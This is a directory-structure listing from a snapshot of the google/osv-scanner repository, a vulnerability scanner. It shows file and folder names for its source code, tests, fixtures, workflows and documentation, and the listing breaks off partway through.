Repository: google/osv-scanner Branch: main Commit: 35535698af3e Files: 837 Total size: 13.1 MB Directory structure: gitextract_t0q6fdgj/ ├── .dockerignore ├── .editorconfig ├── .gemini/ │ └── config.yaml ├── .github/ │ ├── PULL_REQUEST_TEMPLATE/ │ │ └── PULL_REQUEST_TEMPLATE.md │ └── workflows/ │ ├── cassettes.yml │ ├── checks.yml │ ├── codeql-analysis.yml │ ├── dependencies.yml │ ├── format-action/ │ │ └── action.yml │ ├── goreleaser-nightly.yml │ ├── goreleaser.yml │ ├── links.yml │ ├── lint-action/ │ │ └── action.yml │ ├── osv-scanner-reusable-pr.yml │ ├── osv-scanner-reusable.yml │ ├── osv-scanner-unified-action.yml │ ├── prerelease-check.yml │ ├── renovate-validator.yml │ ├── scorecards.yml │ ├── snapshots.yml │ ├── staleness.yml │ ├── test-action/ │ │ └── action.yml │ ├── title.yml │ └── zizmor.yml ├── .gitignore ├── .golangci-lint-version ├── .golangci.yaml ├── .goreleaser-nightly.yml ├── .goreleaser.yml ├── .pre-commit-hooks.yaml ├── .prettierignore ├── .prettierrc.json ├── CHANGELOG.md ├── CONTRIBUTING.md ├── Dockerfile ├── LICENSE ├── Makefile ├── README.md ├── action.dockerfile ├── actions/ │ ├── reporter/ │ │ └── action.yml │ └── scanner/ │ └── action.yml ├── cmd/ │ ├── osv-reporter/ │ │ ├── main.go │ │ └── main_test.go │ └── osv-scanner/ │ ├── __snapshots__/ │ │ └── main_test.snap │ ├── fix/ │ │ ├── __snapshots__/ │ │ │ └── command_test.snap │ │ ├── command.go │ │ ├── command_test.go │ │ ├── interactive.go │ │ ├── model.go │ │ ├── noninteractive.go │ │ ├── output.go │ │ ├── regen_lockfile.go │ │ ├── state-choose-in-place-patches.go │ │ ├── state-choose-strategy.go │ │ ├── state-in-place-result.go │ │ ├── state-initialize.go │ │ ├── state-relock-result.go │ │ ├── testdata/ │ │ │ ├── in-place-npm/ │ │ │ │ └── osv-scanner.toml │ │ │ ├── override-maven/ │ │ │ │ ├── osv-scanner.toml │ │ │ │ └── pom.xml │ │ │ └── relax-npm/ │ │ │ └── package.json │ │ └── testmain_test.go │ ├── internal/ │ │ ├── cmd/ │ │ │ ├── __snapshots__/ │ │ │ │ └── helpers_test.snap │ │ │ ├── helpers.go │ │ │ ├── helpers_test.go │ │ │ ├── run.go │ │ │ └── testmain_test.go │ │ ├── helper/ │ │ │ ├── callanalysis_parser.go │ │ │ ├── callanalysis_parser_test.go │ │ │ ├── flags.go │ │ │ ├── getters.go │ │ │ └── misc.go │ │ └── testcmd/ │ │ ├── case.go │ │ ├── copy.go │ │ ├── git.go │ │ ├── run.go │ │ └── vcr.go │ ├── main.go │ ├── main_test.go │ ├── mcp/ │ │ ├── __snapshots__/ │ │ │ └── integration_test.snap │ │ ├── command.go │ │ ├── configuration-instructions.md │ │ ├── integration_test.go │ │ ├── scan-deps-prompt.md │ │ ├── stats.go │ │ ├── testdata/ │ │ │ └── go-project/ │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ ├── main.go │ │ │ ├── osv-scanner-test.toml │ │ │ └── osv-scanner.toml │ │ └── testmain_test.go │ ├── scan/ │ │ ├── __snapshots__/ │ │ │ └── command_test.snap │ │ ├── command.go │ │ ├── command_test.go │ │ ├── image/ │ │ │ ├── __snapshots__/ │ │ │ │ └── command_test.snap │ │ │ ├── command.go │ │ │ ├── command_test.go │ │ │ ├── testdata/ │ │ │ │ ├── alpine-3.18-alpine-release │ │ │ │ ├── alpine-3.18-os-release │ │ │ │ ├── cassettes/ │ │ │ │ │ ├── TestCommand_Docker.yaml │ │ │ │ │ ├── TestCommand_ExplicitExtractors_WithDefaults.yaml │ │ │ │ │ ├── TestCommand_ExplicitExtractors_WithoutDefaults.yaml │ │ │ │ │ ├── TestCommand_HtmlFile.yaml │ │ │ │ │ ├── TestCommand_OCIImage.yaml │ │ │ │ │ └── TestCommand_OCIImage_JSONFormat.yaml │ │ │ │ ├── java-fixture/ │ │ │ │ │ └── app/ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ ├── pom.xml │ │ │ │ │ └── src/ │ │ │ │ │ └── main/ │ │ │ │ │ └── java/ │ │ │ │ │ └── com/ │ │ │ │ │ └── mycompany/ │ │ │ │ │ └── app/ │ │ │ │ │ └── App.java │ │ │ │ ├── lockfile-fixture/ │ │ │ │ │ ├── alpine-zlib-16.cdx.json │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── package-tracing-fixture/ │ │ │ │ │ ├── go.mod │ │ │ │ │ ├── go.sum │ │ │ │ │ ├── main.go │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── python-fixture/ │ │ │ │ │ ├── main.py │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ └── requirements.txt │ │ │ │ ├── sample-pkgs/ │ │ │ │ │ └── fzf_0.29.0-1ubuntu0.1_amd64.deb │ │ │ │ ├── test-alpine-etcshadow.Dockerfile │ │ │ │ ├── test-alpine-sbom.Dockerfile │ │ │ │ ├── test-alpine.Dockerfile │ │ │ │ ├── test-go-binary.Dockerfile │ │ │ │ ├── test-image-with-deprecated/ │ │ │ │ │ ├── Cargo.toml │ │ │ │ │ └── src/ │ │ │ │ │ └── main.rs │ │ │ │ ├── test-image-with-deprecated.Dockerfile │ │ │ │ ├── test-java-full.Dockerfile │ │ │ │ ├── test-node_modules-npm-empty.Dockerfile │ │ │ │ ├── test-node_modules-npm-full.Dockerfile │ │ │ │ ├── test-node_modules-pnpm-empty.Dockerfile │ │ │ │ ├── test-node_modules-pnpm-full.Dockerfile │ │ │ │ ├── test-node_modules-yarn-empty.Dockerfile │ │ │ │ ├── test-node_modules-yarn-full.Dockerfile │ │ │ │ ├── test-package-tracing.Dockerfile │ │ │ │ ├── test-python-empty.Dockerfile │ │ │ │ ├── test-python-full.Dockerfile │ │ │ │ ├── test-ubuntu-20-04.Dockerfile │ │ │ │ ├── test-ubuntu-with-packages.Dockerfile │ │ │ │ ├── test-ubuntu.Dockerfile │ │ │ │ └── ubuntu20-04-unimportant-config.toml │ │ │ └── testmain_test.go │ │ ├── source/ │ │ │ ├── __snapshots__/ │ │ │ │ └── command_test.snap │ │ │ ├── command.go │ │ │ ├── command_test.go │ │ │ ├── testdata/ │ │ │ │ ├── .goignore │ │ │ │ ├── artifact/ │ │ │ │ │ ├── javareach_test.jar │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── bin/ │ │ │ │ │ └── ssh │ │ │ │ ├── call-analysis-go-project/ │ │ │ │ │ ├── go.mod │ │ │ │ │ ├── go.sum │ │ │ │ │ ├── main.go │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── call-analysis-go-project-all-uncalled/ │ │ │ │ │ ├── go.mod │ │ │ │ │ ├── go.sum │ │ │ │ │ ├── main.go │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── cassettes/ │ │ │ │ │ ├── TestCommand.yaml │ │ │ │ │ ├── TestCommandNonGit.yaml │ │ │ │ │ ├── TestCommand_CallAnalysis.yaml │ │ │ │ │ ├── TestCommand_CommitSupport.yaml │ │ │ │ │ ├── TestCommand_Config_UnusedIgnores.yaml │ │ │ │ │ ├── TestCommand_ExplicitExtractors_WithDefaults.yaml │ │ │ │ │ ├── TestCommand_ExplicitExtractors_WithoutDefaults.yaml │ │ │ │ │ ├── TestCommand_GithubActions.yaml │ │ │ │ │ ├── TestCommand_HtmlFile.yaml │ │ │ │ │ ├── TestCommand_HtmlFile_Deprecated.yaml │ │ │ │ │ ├── TestCommand_JavareachArchive.yaml │ │ │ │ │ ├── TestCommand_Licenses.yaml │ │ │ │ │ ├── TestCommand_LocalDatabases.yaml │ │ │ │ │ ├── TestCommand_LocalDatabases_AlwaysOffline.yaml │ │ │ │ │ ├── TestCommand_LockfileWithExplicitParseAs.yaml │ │ │ │ │ ├── TestCommand_MoreLockfiles.yaml │ │ │ │ │ ├── TestCommand_Transitive.yaml │ │ │ │ │ ├── TestCommand_WithDetector_OffLinux.yaml │ │ │ │ │ └── TestCommand_WithDetector_OnLinux.yaml │ │ │ │ ├── config-invalid/ │ │ │ │ │ └── osv-scanner-test.toml │ │ │ │ ├── exp-plugins-pkgdeprecate/ │ │ │ │ │ └── deprecated-vuln/ │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── go-project/ │ │ │ │ │ ├── go-version-config.toml │ │ │ │ │ ├── go.mod │ │ │ │ │ ├── nested/ │ │ │ │ │ │ ├── go-version-config.toml │ │ │ │ │ │ ├── go.mod │ │ │ │ │ │ └── osv-scanner.toml │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── locks-git/ │ │ │ │ │ └── osv-scanner.json │ │ │ │ ├── locks-gitignore/ │ │ │ │ │ ├── subdir/ │ │ │ │ │ │ └── test.gitignore │ │ │ │ │ └── test.gitignore │ │ │ │ ├── locks-insecure/ │ │ │ │ │ ├── my-package-lock.json │ │ │ │ │ ├── osv-scanner-custom-git-tag.json │ │ │ │ │ ├── osv-scanner-custom.json │ │ │ │ │ ├── osv-scanner-flutter-deps.json │ │ │ │ │ ├── osv-scanner-with-unscannables.json │ │ │ │ │ ├── osv-scanner.json │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── locks-licenses/ │ │ │ │ │ └── package.json │ │ │ │ ├── locks-many/ │ │ │ │ │ ├── installed │ │ │ │ │ ├── not-a-lockfile.toml │ │ │ │ │ ├── osv-scanner-test.toml │ │ │ │ │ ├── replace-local.mod │ │ │ │ │ └── status │ │ │ │ ├── locks-many-with-insecure/ │ │ │ │ │ ├── alpine.cdx.xml │ │ │ │ │ ├── installed │ │ │ │ │ ├── not-a-lockfile.toml │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ ├── replace-local.mod │ │ │ │ │ └── status │ │ │ │ ├── locks-none/ │ │ │ │ │ └── README.md │ │ │ │ ├── locks-requirements/ │ │ │ │ │ ├── my-requirements.txt │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ ├── requirements-dev.txt │ │ │ │ │ ├── requirements-transitive.txt │ │ │ │ │ ├── requirements.prod.txt │ │ │ │ │ ├── requirements.txt │ │ │ │ │ ├── the_requirements_for_test.txt │ │ │ │ │ └── unresolvable-requirements.txt │ │ │ │ ├── locks-scalibr/ │ │ │ │ │ ├── Package.resolved │ │ │ │ │ ├── cabal.project.freeze │ │ │ │ │ ├── depsjson │ │ │ │ │ ├── gems.locked │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ ├── packages.config │ │ │ │ │ └── packages.lock.json │ │ │ │ ├── locks-test-ignore/ │ │ │ │ │ ├── osv-scanner-test.toml │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── maven-transitive/ │ │ │ │ │ ├── abc.xml │ │ │ │ │ ├── encoding.xml │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ ├── parent.xml │ │ │ │ │ ├── pom.xml │ │ │ │ │ └── registry.xml │ │ │ │ ├── osv-scanner-call-analysis-config.toml │ │ │ │ ├── osv-scanner-complex-licenses-config.toml │ │ │ │ ├── osv-scanner-composite-config.toml │ │ │ │ ├── osv-scanner-duplicate-config.toml │ │ │ │ ├── osv-scanner-empty-config.toml │ │ │ │ ├── osv-scanner-expressive-licenses-config.toml │ │ │ │ ├── osv-scanner-invalid-licenses-config.toml │ │ │ │ ├── osv-scanner-partial-ignores-config.toml │ │ │ │ ├── osv-scanner-reasonless-ignores-config.toml │ │ │ │ ├── osv-scanner-unknown-config.toml │ │ │ │ └── sbom-insecure/ │ │ │ │ ├── alpine-zlib-16.cdx.json │ │ │ │ ├── alpine.cdx.xml │ │ │ │ ├── bad-purls.cdx.xml │ │ │ │ ├── only-unimportant.spdx.json │ │ │ │ ├── osv-scanner.toml │ │ │ │ ├── postgres-stretch.cdx.xml │ │ │ │ └── with-duplicates.cdx.xml │ │ │ └── testmain_test.go │ │ ├── testdata/ │ │ │ ├── cassettes/ │ │ │ │ └── TestCommand_SubCommands.yaml │ │ │ └── locks-many/ │ │ │ ├── alpine.cdx.xml │ │ │ ├── installed │ │ │ ├── not-a-lockfile.toml │ │ │ ├── osv-scanner.toml │ │ │ ├── replace-local.mod │ │ │ └── status │ │ └── testmain_test.go │ ├── testdata/ │ │ ├── cassettes/ │ │ │ └── Test_run_SubCommands.yaml │ │ └── locks-many/ │ │ ├── alpine.cdx.xml │ │ ├── installed │ │ ├── not-a-lockfile.toml │ │ ├── osv-scanner.toml │ │ ├── replace-local.mod │ │ └── status │ ├── testmain_test.go │ └── update/ │ ├── __snapshots__/ │ │ └── command_test.snap │ ├── command.go │ ├── command_test.go │ ├── testdata/ │ │ ├── osv-scanner.toml │ │ └── pom.xml │ └── testmain_test.go ├── docs/ │ ├── .gitignore │ ├── 404.html │ ├── Gemfile │ ├── README.md │ ├── _config.yml │ ├── _sass/ │ │ ├── color_schemes/ │ │ │ ├── _variables.scss │ │ │ └── custom_dark.scss │ │ ├── custom/ │ │ │ └── custom.scss │ │ └── highlight/ │ │ └── native.scss │ ├── configuration.md │ ├── contribute.md │ ├── docs.Dockerfile │ ├── experimental.md │ ├── github-action.md │ ├── guided-remediation.md │ ├── index.md │ ├── installation.md │ ├── license-scanning.md │ ├── manual-plugin-selection.md │ ├── migrating-from-scalibr.md │ ├── migration-guide.md │ ├── offline-mode.md │ ├── osv-reporter.md │ ├── output.md │ ├── package-deprecation.md │ ├── scan-image.md │ ├── scan-source.md │ ├── supported_languages_and_lockfiles.md │ └── usage.md ├── exit_code_redirect.sh ├── go.mod ├── go.sum ├── goreleaser-action.dockerfile ├── goreleaser.dockerfile ├── internal/ │ ├── cachedregexp/ │ │ └── regex.go │ ├── ci/ │ │ ├── __snapshots__/ │ │ │ └── vulnerability_result_diff_test.snap │ │ ├── testdata/ │ │ │ ├── not-json.txt │ │ │ ├── results-empty.json │ │ │ ├── results-some.json │ │ │ └── vulns/ │ │ │ ├── test-vuln-results-a-1.json │ │ │ ├── test-vuln-results-a.json │ │ │ ├── test-vuln-results-b.json │ │ │ ├── test-vuln-results-c.json │ │ │ └── test-vuln-results-d.json │ │ ├── testmain_test.go │ │ ├── utility.go │ │ ├── utility_test.go │ │ ├── vulnerability_result_diff.go │ │ └── vulnerability_result_diff_test.go │ ├── clients/ │ │ ├── clientimpl/ │ │ │ ├── licensematcher/ │ │ │ │ └── licensematcher.go │ │ │ ├── localmatcher/ │ │ │ │ ├── localmatcher.go │ │ │ │ ├── testdata/ │ │ │ │ │ └── db/ │ │ │ │ │ ├── file.json │ │ │ │ │ ├── file.yaml │ │ │ │ │ ├── nested-1/ │ │ │ │ │ │ └── osv-1.json │ │ │ │ │ └── nested-2/ │ │ │ │ │ ├── invalid.json │ │ │ │ │ └── osv-2.json │ │ │ │ ├── zip.go │ │ │ │ └── zip_test.go │ │ │ └── osvmatcher/ │ │ │ ├── cachedosvmatcher.go │ │ │ ├── osvmatcher.go │ │ │ └── osvmatcher_test.go │ │ └── clientinterfaces/ │ │ ├── licensematcher.go │ │ └── vulnerabilitymatcher.go │ ├── cmdlogger/ │ │ ├── fmt.go │ │ ├── handler.go │ │ ├── interface.go │ │ ├── level.go │ │ ├── level_test.go │ │ ├── scalibr.go │ │ └── static.go │ ├── config/ │ │ ├── config.go │ │ ├── config_internal_test.go │ │ ├── manager.go │ │ └── testdata/ │ │ ├── testdatainner/ │ │ │ ├── innerFolder/ │ │ │ │ └── test.yaml │ │ │ ├── osv-scanner-load-path.toml │ │ │ ├── osv-scanner.toml │ │ │ └── some-manifest.yaml │ │ ├── unknown-key-1.toml │ │ ├── unknown-key-2.toml │ │ ├── unknown-key-3.toml │ │ ├── unknown-key-4.toml │ │ ├── unknown-key-5.toml │ │ ├── unknown-key-6.toml │ │ └── unknown-key-7.toml │ ├── datasource/ │ │ ├── cache.go │ │ ├── cache_test.go │ │ ├── http_auth.go │ │ ├── http_auth_test.go │ │ ├── insights.go │ │ ├── insights_cache.go │ │ ├── insightsalpha.go │ │ ├── maven_registry.go │ │ ├── maven_registry_cache.go │ │ ├── maven_registry_test.go │ │ ├── maven_settings.go │ │ ├── maven_settings_test.go │ │ ├── npm_registry.go │ │ ├── npm_registry_cache.go │ │ ├── npm_registry_test.go │ │ ├── npmrc.go │ │ ├── npmrc_test.go │ │ └── testdata/ │ │ ├── maven_settings/ │ │ │ └── settings.xml │ │ └── npm_registry/ │ │ ├── @fake-registry-a.json │ │ ├── fake-package-2.2.2.json │ │ └── fake-package.json │ ├── depsdev/ │ │ └── depsdev.go │ ├── grouper/ │ │ ├── grouper.go │ │ ├── grouper_models.go │ │ └── grouper_test.go │ ├── identifiers/ │ │ ├── identifiers.go │ │ └── identifiers_test.go │ ├── imodels/ │ │ ├── imodels.go │ │ ├── imodels_test.go │ │ └── results/ │ │ └── scanresults.go │ ├── output/ │ │ ├── __snapshots__/ │ │ │ ├── cyclonedx_test.snap │ │ │ ├── githubannotation_test.snap │ │ │ ├── machinejson_test.snap │ │ │ ├── markdowntable_test.snap │ │ │ ├── output_result_test.snap │ │ │ ├── result_test.snap │ │ │ ├── sarif_internal_test.snap │ │ │ ├── sarif_test.snap │ │ │ ├── spdx_test.snap │ │ │ ├── table_test.snap │ │ │ └── vertical_test.snap │ │ ├── cyclonedx.go │ │ ├── cyclonedx_test.go │ │ ├── form.go │ │ ├── form_test.go │ │ ├── githubannotation.go │ │ ├── githubannotation_test.go │ │ ├── helpers_test.go │ │ ├── html/ │ │ │ ├── base_image_template.gohtml │ │ │ ├── deprecated_package_template.gohtml │ │ │ ├── filter_template.gohtml │ │ │ ├── license_summary_template.gohtml │ │ │ ├── package_table_template.gohtml │ │ │ ├── package_view_template.gohtml │ │ │ ├── report_template.gohtml │ │ │ ├── script.js │ │ │ ├── severity_summary_template.gohtml │ │ │ ├── style.css │ │ │ ├── vuln_table_entry_template.gohtml │ │ │ └── vuln_table_template.gohtml │ │ ├── html.go │ │ ├── html_test.go │ │ ├── machinejson.go │ │ ├── machinejson_test.go │ │ ├── markdowntable.go │ │ ├── markdowntable_test.go │ │ ├── output_result.go │ │ ├── output_result_test.go │ │ ├── result.go │ │ ├── result_test.go │ │ ├── sarif.go │ │ ├── sarif_fingerprint_test.go │ │ ├── sarif_internal_test.go │ │ ├── sarif_test.go │ │ ├── sbom/ │ │ │ ├── cyclonedx_1_4.go │ │ │ ├── cyclonedx_1_5.go │ │ │ ├── cyclonedx_1_6.go │ │ │ ├── cyclonedx_common.go │ │ │ └── models.go │ │ ├── spdx.go │ │ ├── spdx_test.go │ │ ├── table.go │ │ ├── table_test.go │ │ ├── testdata/ │ │ │ ├── commit-grouped.json │ │ │ ├── flattened_vulns.json │ │ │ ├── test-vuln-results-a.json │ │ │ └── vuln-grouped.json │ │ ├── testmain_test.go │ │ ├── vertical.go │ │ └── vertical_test.go │ ├── remediation/ │ │ ├── __snapshots__/ │ │ │ ├── in_place_test.snap │ │ │ └── testhelpers_test.snap │ │ ├── in_place.go │ │ ├── in_place_test.go │ │ ├── override.go │ │ ├── override_test.go │ │ ├── relax/ │ │ │ ├── npm.go │ │ │ ├── npm_test.go │ │ │ └── relax.go │ │ ├── relax.go │ │ ├── relax_test.go │ │ ├── remediation.go │ │ ├── remediation_test.go │ │ ├── suggest/ │ │ │ ├── maven.go │ │ │ ├── maven_test.go │ │ │ └── suggest.go │ │ ├── testdata/ │ │ │ ├── maven-classifier/ │ │ │ │ ├── osv-scanner.toml │ │ │ │ ├── pom.xml │ │ │ │ ├── universe.yaml │ │ │ │ └── vulns.json │ │ │ ├── override-workaround/ │ │ │ │ ├── commons/ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ └── pom.xml │ │ │ │ ├── guava/ │ │ │ │ │ ├── android-to-android/ │ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ │ └── pom.xml │ │ │ │ │ ├── jre-to-jre/ │ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ │ └── pom.xml │ │ │ │ │ └── none-to-jre/ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ └── pom.xml │ │ │ │ ├── universe.yaml │ │ │ │ └── vulns.json │ │ │ ├── santatracker/ │ │ │ │ ├── osv-scanner.toml │ │ │ │ ├── package.json │ │ │ │ ├── universe.yaml │ │ │ │ └── vulns.json │ │ │ └── zeppelin-server/ │ │ │ ├── osv-scanner.toml │ │ │ ├── parent/ │ │ │ │ ├── osv-scanner.toml │ │ │ │ ├── parent/ │ │ │ │ │ └── pom.xml │ │ │ │ └── pom.xml │ │ │ ├── pom.xml │ │ │ ├── universe.yaml │ │ │ └── vulns.json │ │ ├── testhelpers_test.go │ │ ├── testmain_test.go │ │ └── upgrade/ │ │ ├── config.go │ │ ├── config_test.go │ │ ├── level.go │ │ └── level_test.go │ ├── reporter/ │ │ ├── cyclonedx.go │ │ ├── format.go │ │ ├── gh-annotations_reporter.go │ │ ├── html_reporter.go │ │ ├── json_reporter.go │ │ ├── reporter.go │ │ ├── reporter_test.go │ │ ├── sarif_reporter.go │ │ ├── spdx.go │ │ ├── table_reporter.go │ │ └── vertical_reporter.go │ ├── resolution/ │ │ ├── __snapshots__/ │ │ │ └── resolve_test.snap │ │ ├── client/ │ │ │ ├── client.go │ │ │ ├── depsdev_client.go │ │ │ ├── helper.go │ │ │ ├── maven_registry_client.go │ │ │ ├── npm_registry_client.go │ │ │ └── override_client.go │ │ ├── clienttest/ │ │ │ └── mock_resolution_client.go │ │ ├── dependency_subgraph.go │ │ ├── dependency_subgraph_test.go │ │ ├── depfile/ │ │ │ └── depfile.go │ │ ├── lockfile/ │ │ │ ├── __snapshots__/ │ │ │ │ └── npm_test.snap │ │ │ ├── lockfile.go │ │ │ ├── npm.go │ │ │ ├── npm_test.go │ │ │ ├── npm_v1.go │ │ │ ├── npm_v2.go │ │ │ ├── testdata/ │ │ │ │ ├── npm_registry/ │ │ │ │ │ ├── @fake-registry-a-1.2.4.json │ │ │ │ │ └── @fake-registry-a-2.3.5.json │ │ │ │ ├── npm_v1/ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ └── package.json │ │ │ │ └── npm_v2/ │ │ │ │ └── osv-scanner.toml │ │ │ └── testmain_test.go │ │ ├── manifest/ │ │ │ ├── __snapshots__/ │ │ │ │ ├── maven_test.snap │ │ │ │ └── npm_test.snap │ │ │ ├── manifest.go │ │ │ ├── maven.go │ │ │ ├── maven_test.go │ │ │ ├── npm.go │ │ │ ├── npm_test.go │ │ │ ├── testdata/ │ │ │ │ ├── maven/ │ │ │ │ │ ├── my-app/ │ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ │ └── pom.xml │ │ │ │ │ ├── no-dependency-management.xml │ │ │ │ │ └── parent/ │ │ │ │ │ ├── grandparent/ │ │ │ │ │ │ ├── mismatch.xml │ │ │ │ │ │ └── pom.xml │ │ │ │ │ └── pom.xml │ │ │ │ ├── npm-workspaces/ │ │ │ │ │ ├── package.json │ │ │ │ │ ├── ws/ │ │ │ │ │ │ ├── jquery/ │ │ │ │ │ │ │ └── package.json │ │ │ │ │ │ └── ugh/ │ │ │ │ │ │ └── package.json │ │ │ │ │ └── z/ │ │ │ │ │ └── package.json │ │ │ │ └── package.json │ │ │ └── testmain_test.go │ │ ├── resolve.go │ │ ├── resolve_test.go │ │ ├── testdata/ │ │ │ ├── basic-universe.yaml │ │ │ ├── basic-vulns.json │ │ │ ├── complex-universe.yaml │ │ │ ├── complex-vulns.json │ │ │ ├── diamond-universe.yaml │ │ │ └── diamond-vulns.json │ │ ├── testmain_test.go │ │ └── util/ │ │ └── depsdev.go │ ├── scalibrenricher/ │ │ └── govulncheck/ │ │ └── source/ │ │ ├── govulncheck.go │ │ ├── govulncheck_test.go │ │ ├── result.go │ │ └── testdata/ │ │ ├── go.mod │ │ ├── go.sum │ │ ├── main.go │ │ └── osv-scanner.toml │ ├── scalibrextract/ │ │ ├── filesystem/ │ │ │ └── vendored/ │ │ │ ├── testdata/ │ │ │ │ └── thirdparty/ │ │ │ │ └── zlib/ │ │ │ │ ├── .gitignore │ │ │ │ ├── CMakeLists.txt │ │ │ │ ├── ChangeLog │ │ │ │ ├── FAQ │ │ │ │ ├── INDEX │ │ │ │ ├── LICENSE │ │ │ │ ├── Makefile │ │ │ │ ├── Makefile.in │ │ │ │ ├── README │ │ │ │ ├── adler32.c │ │ │ │ ├── amiga/ │ │ │ │ │ ├── Makefile.pup │ │ │ │ │ └── Makefile.sas │ │ │ │ ├── compress.c │ │ │ │ ├── configure │ │ │ │ ├── crc32.c │ │ │ │ ├── crc32.h │ │ │ │ ├── deflate.c │ │ │ │ ├── deflate.h │ │ │ │ ├── examples/ │ │ │ │ │ ├── README.examples │ │ │ │ │ ├── enough.c │ │ │ │ │ ├── fitblk.c │ │ │ │ │ ├── gun.c │ │ │ │ │ ├── gzappend.c │ │ │ │ │ ├── gzjoin.c │ │ │ │ │ ├── gzlog.c │ │ │ │ │ ├── gzlog.h │ │ │ │ │ ├── gznorm.c │ │ │ │ │ ├── zlib_how.html │ │ │ │ │ ├── zpipe.c │ │ │ │ │ ├── zran.c │ │ │ │ │ └── zran.h │ │ │ │ ├── gzclose.c │ │ │ │ ├── gzguts.h │ │ │ │ ├── gzlib.c │ │ │ │ ├── gzread.c │ │ │ │ ├── gzwrite.c │ │ │ │ ├── infback.c │ │ │ │ ├── inffast.c │ │ │ │ ├── inffast.h │ │ │ │ ├── inffixed.h │ │ │ │ ├── inflate.c │ │ │ │ ├── inflate.h │ │ │ │ ├── inftrees.c │ │ │ │ ├── inftrees.h │ │ │ │ ├── make_vms.com │ │ │ │ ├── nintendods/ │ │ │ │ │ ├── Makefile │ │ │ │ │ └── README │ │ │ │ ├── os400/ │ │ │ │ │ ├── README400 │ │ │ │ │ ├── bndsrc │ │ │ │ │ ├── make.sh │ │ │ │ │ └── zlib.inc │ │ │ │ ├── osv-scanner.toml │ │ │ │ ├── qnx/ │ │ │ │ │ └── package.qpg │ │ │ │ ├── test/ │ │ │ │ │ ├── example.c │ │ │ │ │ ├── infcover.c │ │ │ │ │ └── minigzip.c │ │ │ │ ├── treebuild.xml │ │ │ │ ├── trees.c │ │ │ │ ├── trees.h │ │ │ │ ├── uncompr.c │ │ │ │ ├── watcom/ │ │ │ │ │ ├── watcom_f.mak │ │ │ │ │ └── watcom_l.mak │ │ │ │ ├── win32/ │ │ │ │ │ ├── DLL_FAQ.txt │ │ │ │ │ ├── Makefile.bor │ │ │ │ │ ├── Makefile.gcc │ │ │ │ │ ├── Makefile.msc │ │ │ │ │ ├── README-WIN32.txt │ │ │ │ │ ├── VisualC.txt │ │ │ │ │ ├── zlib.def │ │ │ │ │ └── zlib1.rc │ │ │ │ ├── zconf.h │ │ │ │ ├── zconf.h.cmakein │ │ │ │ ├── zconf.h.in │ │ │ │ ├── zlib.3 │ │ │ │ ├── zlib.h │ │ │ │ ├── zlib.pc.cmakein │ │ │ │ ├── zlib.pc.in │ │ │ │ ├── zutil.c │ │ │ │ └── zutil.h │ │ │ ├── vendored.go │ │ │ └── vendored_test.go │ │ ├── language/ │ │ │ ├── javascript/ │ │ │ │ └── nodemodules/ │ │ │ │ └── extractor.go │ │ │ └── osv/ │ │ │ └── osvscannerjson/ │ │ │ ├── extractor.go │ │ │ ├── extractor_test.go │ │ │ ├── metadata.go │ │ │ └── testdata/ │ │ │ ├── empty.json │ │ │ ├── multiple-packages-with-vulns.json │ │ │ ├── not-json.txt │ │ │ ├── one-package-commit.json │ │ │ └── one-package.json │ │ └── vcs/ │ │ ├── gitcommitdirect/ │ │ │ └── extractor.go │ │ └── gitrepo/ │ │ ├── extractor.go │ │ ├── extractor_test.go │ │ └── testdata/ │ │ ├── example-clean/ │ │ │ └── git-hidden/ │ │ │ ├── HEAD │ │ │ ├── config │ │ │ ├── description │ │ │ └── info/ │ │ │ └── exclude │ │ ├── example-git/ │ │ │ ├── a.txt │ │ │ └── git-hidden/ │ │ │ ├── COMMIT_EDITMSG │ │ │ ├── HEAD │ │ │ ├── config │ │ │ ├── description │ │ │ ├── index │ │ │ ├── info/ │ │ │ │ └── exclude │ │ │ ├── logs/ │ │ │ │ ├── HEAD │ │ │ │ └── refs/ │ │ │ │ └── heads/ │ │ │ │ └── main │ │ │ ├── objects/ │ │ │ │ ├── 16/ │ │ │ │ │ └── b14f5da9e2fcd6f3f38cc9e584cef2f3c90ebe │ │ │ │ ├── 4b/ │ │ │ │ │ └── 825dc642cb6eb9a060e54bf8d69288fbee4904 │ │ │ │ ├── 86/ │ │ │ │ │ └── 2ac4bd2703b622e85f29f55a2fd8cd6caf8182 │ │ │ │ └── bf/ │ │ │ │ └── 8fbfe5a434c007b640c12d920683cb19a7b2b9 │ │ │ └── refs/ │ │ │ └── heads/ │ │ │ └── main │ │ └── example-not-git/ │ │ ├── a.txt │ │ └── git-hidden/ │ │ └── b.txt │ ├── scalibrplugin/ │ │ ├── __snapshots__/ │ │ │ └── resolve_test.snap │ │ ├── presets.go │ │ ├── resolve.go │ │ ├── resolve_test.go │ │ └── testmain_test.go │ ├── sourceanalysis/ │ │ ├── __snapshots__/ │ │ │ ├── go_test.snap │ │ │ ├── integration_test.snap │ │ │ └── rust_test.snap │ │ ├── go.go │ │ ├── go_test.go │ │ ├── govulncheck/ │ │ │ └── result.go │ │ ├── integration_test.go │ │ ├── rust.go │ │ ├── rust_test.go │ │ ├── sourceanalysis.go │ │ ├── testdata/ │ │ │ ├── go-integration/ │ │ │ │ ├── .goignore │ │ │ │ ├── GO-2021-0053.json │ │ │ │ ├── GO-2023-1558.json │ │ │ │ ├── GO-2023-2382.json │ │ │ │ └── test-project/ │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ ├── main.go │ │ │ │ └── osv-scanner.toml 